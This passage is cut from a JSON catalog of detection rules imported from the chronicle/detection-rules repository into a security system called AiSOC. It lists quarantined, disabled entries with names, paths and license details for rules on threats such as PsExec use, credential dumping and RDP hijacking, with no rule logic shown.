"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/powershell_loaded_via_dll.yaral" } }, { "id": "chronicle-detection-rules-powershell-network-connections", "type": "detection", "name": "powershell_network_connections", "description": "powershell_network_connections", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-network-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_network_connections", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_network_connections.yaral" } }, { "id": "chronicle-detection-rules-powershell-obfuscation-by-agenttesla", "type": "detection", "name": "powershell_obfuscation_by_agenttesla", "description": "powershell_obfuscation_by_agenttesla", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-obfuscation-by-agenttesla.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_obfuscation_by_agenttesla", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_obfuscation_by_agenttesla.yaral" } }, { "id": "chronicle-detection-rules-powershell-rundll32-remote-thread-creation", "type": "detection", "name": 
"powershell_rundll32_remote_thread_creation", "description": "powershell_rundll32_remote_thread_creation", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-rundll32-remote-thread-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_rundll32_remote_thread_creation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/powershell_rundll32_remote_thread_creation.yaral" } }, { "id": "chronicle-detection-rules-powershell-script-run-in-appdata", "type": "detection", "name": "powershell_script_run_in_appdata", "description": "powershell_script_run_in_appdata", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-script-run-in-appdata.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_script_run_in_appdata", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_script_run_in_appdata.yaral" } }, { "id": "chronicle-detection-rules-powershell-web-download", "type": "detection", "name": "powershell_web_download", "description": "powershell_web_download", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-web-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_web_download", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/powershell_web_download.yaral" } }, { "id": "chronicle-detection-rules-printbrm-zip-creation-or-extraction", "type": "detection", "name": "printbrm_zip_creation_or_extraction", "description": "printbrm_zip_creation_or_extraction", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/printbrm-zip-creation-or-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "printbrm_zip_creation_or_extraction", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/printbrm_zip_creation_or_extraction.yaral" } }, { "id": "chronicle-detection-rules-process-dump-via-comsvcs-dll", "type": "detection", "name": "process_dump_via_comsvcs_dll", "description": "process_dump_via_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_dump_via_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/process_dump_via_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-process-launch-vt-enrichment", "type": "detection", "name": "process_launch_vt_enrichment", "description": "process_launch_vt_enrichment", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-launch-vt-enrichment.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_launch_vt_enrichment", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/process_launch_vt_enrichment.yaral" } }, { "id": "chronicle-detection-rules-process-memory-dump-via-comsvcs-dll", "type": "detection", "name": "process_memory_dump_via_comsvcs_dll", "description": "process_memory_dump_via_comsvcs_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-memory-dump-via-comsvcs-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "process_memory_dump_via_comsvcs_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/process_memory_dump_via_comsvcs_dll.yaral" } }, { "id": "chronicle-detection-rules-process-memory-dump-via-rdrleakdiag", "type": "detection", "name": "process_memory_dump_via_rdrleakdiag", "description": "process_memory_dump_via_rdrleakdiag", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/process-memory-dump-via-rdrleakdiag.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "chronicle/detection-rules", "source_id": "process_memory_dump_via_rdrleakdiag", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/process_memory_dump_via_rdrleakdiag.yaral" } }, { "id": "chronicle-detection-rules-program-executions-in-suspicious-folders", "type": "detection", "name": "program_executions_in_suspicious_folders", "description": "program_executions_in_suspicious_folders", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/program-executions-in-suspicious-folders.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "program_executions_in_suspicious_folders", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/linux/program_executions_in_suspicious_folders.yaral" } }, { "id": "chronicle-detection-rules-psexe-renamed-sysinternals-tool", "type": "detection", "name": "psexe_renamed_sysinternals_tool", "description": "psexe_renamed_sysinternals_tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/psexe-renamed-sysinternals-tool.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexe_renamed_sysinternals_tool", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/ps_exe_renamed_sysinternals_tool.yaral" } }, { "id": "chronicle-detection-rules-psexec-detector", "type": "detection", "name": "psexec_detector", "description": "psexec_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/psexec_detector.yaral" } }, { "id": "chronicle-detection-rules-psexec-execution", "type": "detection", "name": "psexec_execution", "description": "psexec_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/psexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/psexec_execution.yaral" } }, { "id": "chronicle-detection-rules-psexec-process-has-terminated", "type": "detection", "name": "psexec_process_has_terminated", "description": "psexec_process_has_terminated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-process-has-terminated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_process_has_terminated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/sysmon/psexec_process_has_terminated.yaral" } }, { "id": "chronicle-detection-rules-psexec-service-start", "type": "detection", "name": "psexec_service_start", "description": "psexec_service_start", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, 
"path": "detections/chronicle-imports/_quarantine/psexec-service-start.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_service_start", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/psexec_service_start.yaral" } }, { "id": "chronicle-detection-rules-psexec-tool-execution", "type": "detection", "name": "psexec_tool_execution", "description": "psexec_tool_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/psexec-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "psexec_tool_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/psexec_tool_execution.yaral" } }, { "id": "chronicle-detection-rules-pua-nimgrab-execution", "type": "detection", "name": "pua_nimgrab_execution", "description": "pua_nimgrab_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/pua-nimgrab-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pua_nimgrab_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/pua_nimgrab_execution.yaral" } }, { "id": "chronicle-detection-rules-public-cyber-enemy-emotet-has-returned", "type": "detection", "name": "public_cyber_enemy_emotet_has_returned", "description": "public_cyber_enemy_emotet_has_returned", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/public-cyber-enemy-emotet-has-returned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "public_cyber_enemy_emotet_has_returned", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/public_cyber_enemy_emotet_has_returned.yaral" } }, { "id": "chronicle-detection-rules-pulse-secure-attack-cve201911510", "type": "detection", "name": "pulse_secure_attack_cve201911510", "description": "pulse_secure_attack_cve201911510", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": 
false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/pulse-secure-attack-cve201911510.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "pulse_secure_attack_cve201911510", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/webserver/pulse_secure_attack_cve_2019_11510.yaral" } }, { "id": "chronicle-detection-rules-quarkspwdump-dump-file", "type": "detection", "name": "quarkspwdump_dump_file", "description": "quarkspwdump_dump_file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/quarkspwdump-dump-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "quarkspwdump_dump_file", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/quarkspwdump_dump_file.yaral" } }, { "id": "chronicle-detection-rules-quasar-rat-detector-sysmon", "type": "detection", "name": "quasar_rat_detector_sysmon", "description": "quasar_rat_detector_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/quasar-rat-detector-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "quasar_rat_detector_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/quasar_rat_detector__sysmon.yaral" } }, { "id": "chronicle-detection-rules-query-credentials-in-registry", "type": "detection", "name": "query_credentials_in_registry", "description": "query_credentials_in_registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/query-credentials-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "query_credentials_in_registry", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/query_credentials_in_registry.yaral" } }, { "id": "chronicle-detection-rules-rdp-hijacking-terminal-services-manipulation", "type": "detection", "name": "rdp_hijacking_terminal_services__manipulation", "description": "rdp_hijacking_terminal_services__manipulation", "version": "1.0.0", "author": "AiSOC", 
"tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-hijacking-terminal-services-manipulation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_hijacking_terminal_services__manipulation", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/rdp_hijacking__terminal_services__manipulation.yaral" } }, { "id": "chronicle-detection-rules-rdp-login-from-localhost", "type": "detection", "name": "rdp_login_from_localhost", "description": "rdp_login_from_localhost", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-login-from-localhost.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_login_from_localhost", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rdp_login_from_localhost.yaral" } }, { "id": "chronicle-detection-rules-rdp-over-reverse-ssh-tunnel-wfp", "type": "detection", "name": 
"rdp_over_reverse_ssh_tunnel_wfp", "description": "rdp_over_reverse_ssh_tunnel_wfp", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-over-reverse-ssh-tunnel-wfp.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_over_reverse_ssh_tunnel_wfp", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/rdp_over_reverse_ssh_tunnel_wfp.yaral" } }, { "id": "chronicle-detection-rules-rdp-sensitive-settings-changed", "type": "detection", "name": "rdp_sensitive_settings_changed", "description": "rdp_sensitive_settings_changed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-sensitive-settings-changed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_sensitive_settings_changed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rdp_sensitive_settings_changed.yaral" } }, { "id": 
"chronicle-detection-rules-rdp-sensitive-settings-changed-to-zero", "type": "detection", "name": "rdp_sensitive_settings_changed_to_zero", "description": "rdp_sensitive_settings_changed_to_zero", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/rdp-sensitive-settings-changed-to-zero.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "rdp_sensitive_settings_changed_to_zero", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/rdp_sensitive_settings_changed_to_zero.yaral" } }, { "id": "chronicle-detection-rules-recon-credential-theft-cisa-report", "type": "detection", "name": "recon_credential_theft_cisa_report", "description": "recon_credential_theft_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-credential-theft-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_credential_theft_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": 
"2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_credential_theft_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-active-directory-cisa-report", "type": "detection", "name": "recon_environment_enumeration_active_directory_cisa_report", "description": "recon_environment_enumeration_active_directory_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-active-directory-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_active_directory_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_active_directory_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-network-cisa-report", "type": "detection", "name": "recon_environment_enumeration_network_cisa_report", "description": "recon_environment_enumeration_network_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-network-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_network_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_network_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-environment-enumeration-system-cisa-report", "type": "detection", "name": "recon_environment_enumeration_system_cisa_report", "description": "recon_environment_enumeration_system_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-environment-enumeration-system-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_environment_enumeration_system_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_environment_enumeration_system_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-successful-logon-enumeration-powershell-t1033-cisa-report", "type": "detection", "name": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "description": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-successful-logon-enumeration-powershell-t1033-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_successful_logon_enumeration_powershell_T1033_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/recon_successful_logon_enumeration_powershell_T1033_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-recon-suspicious-commands-cisa-report", "type": "detection", "name": "recon_suspicious_commands_cisa_report", "description": "recon_suspicious_commands_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/recon-suspicious-commands-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "recon_suspicious_commands_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 